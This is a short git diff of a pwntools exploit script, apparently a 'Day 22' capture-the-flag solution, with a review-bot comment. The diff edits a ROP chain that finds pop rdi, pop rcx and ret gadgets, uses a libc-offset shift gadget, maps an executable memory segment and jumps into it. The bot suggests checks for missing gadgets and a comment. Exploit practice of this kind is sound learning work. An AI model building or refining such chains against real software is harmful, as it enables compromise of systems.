diff --git a/Day 22/exploit.py b/Day 22/exploit.py
index e9c569f..136d569 100755
--- a/Day 22/exploit.py
+++ b/Day 22/exploit.py
@@ -88,8 +88,9 @@ def try_char(offset, char):
     pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"])
     pop_rcx_ret = rop.find_gadget(["pop rcx", "ret"])
+    ret = rop.find_gadget(['ret'])
-    rop.raw(rop.find_gadget(['ret']))
+    rop.raw(ret)
     rop.raw(pop_rcx_ret)
     rop.raw(32)
     rop.raw(pop_rdi_ret)
@@ -101,9 +102,7 @@ def try_char(offset, char):
     else:
         rop.raw(libc.address + 0x54d69) # shl r9, cl ; mov qword ptr [rdi], r9 ; ret
-    rop.raw(rop.find_gadget(['ret']))
     rop.mmap(new_segment, 0x1000, 7, 0x2|0x20) # MAP_ANONYMOUS|MAP_PRIVATE
-    rop.read(0, new_segment, 100)
     rop.call(new_segment)
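Review bot: The new `ret = rop.find_gadget(['ret'])` line, like the `pop_rdi_ret` and `pop_rcx_ret` lookups above it, is fed straight into `rop.raw()` without checking the result; in pwntools `find_gadget` returns `None` when the pattern is absent from the loaded binary, so a libc without the expected gadget yields a chain that fails at build time (or worse, embeds a wrong entry) instead of a clear error. Hoisting the lookup is the right move, so extend it with an explicit guard right after it: `if None in (ret, pop_rdi_ret, pop_rcx_ret):` / `    raise RuntimeError("required ret / pop rdi / pop rcx gadget not found in libc")`. The bare `rop.raw(32)` also deserves a why-comment; from the second hunk it appears to be the shift count popped into rcx for the `shl r9, cl` gadget (`# shift count for shl r9, cl`), but confirm that before wording it as fact. `try_char` begins before this hunk and continues after it, so the surrounding chain was not reviewed here.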